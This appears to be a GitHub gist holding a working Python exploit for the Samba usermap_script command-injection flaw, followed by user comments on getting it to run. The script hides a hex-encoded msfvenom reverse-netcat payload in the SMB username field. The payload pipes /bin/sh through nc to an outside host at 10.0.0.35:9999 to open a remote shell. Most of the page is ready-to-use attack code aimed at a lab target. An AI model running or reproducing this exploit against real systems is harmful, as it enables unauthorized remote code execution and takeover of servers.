Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
@ar0dd

This comment has been minimized.

Copy link

ar0dd commented Mar 3, 2019

Works like a charm. Thanks.

@rehamun

This comment has been minimized.

Copy link

rehamun commented Sep 4, 2019

could u please clarify how the code ganna recognize the RHOST IP or the URL?

@jeffinm

This comment has been minimized.

Copy link

jeffinm commented Feb 26, 2020

Hi
I am getting this error, while running this code. Any idea why?

python samba-usermap-exploit.py

Traceback (most recent call last):
File "samba-usermap-exploit.py", line 4, in
from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

@Anass-bekar

This comment has been minimized.

Copy link

Anass-bekar commented Mar 17, 2020

Download mysmb.py

@toddjones1984

This comment has been minimized.

Copy link

toddjones1984 commented Mar 20, 2020

I downloaded impacket and mysmb,py but I'm still getting errors any help would be appreciated.

Traceback (most recent call last):
File "3.0.20.py", line 3, in
from smb.SMBConnection import SMBConnection
File "/opt/smb/impacket/impacket/smb.py", line 49, in
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
acket and mysmb.py and I'm still having issues.

@edenbomb

This comment has been minimized.

Copy link

edenbomb commented May 27, 2020

According to : http://http.kali.org/kali/pool/main/p/pysmb/
when we try to install smb for python2 it will be error due to file not found.
So I would like to suggest for editing
Old :
print "\nUsage: " + sys.argv[0] + " \n"
New :
print ("\nUsage: " + sys.argv[0] + " \n")

and using python3 instead.

Remark :
Command install ==> sudo sudo apt-get install -y python3-smb

@CybertSys

This comment has been minimized.

Copy link

CybertSys commented Jul 6, 2020

There's an encoding issue. I know what needs to happen but I'm unsure of the syntax.

username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

@MidnightSeer

This comment has been minimized.

Copy link

MidnightSeer commented Jul 14, 2020

A tip, stick with python2, pip install pysmb still works...this exploit is the simplest they come.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.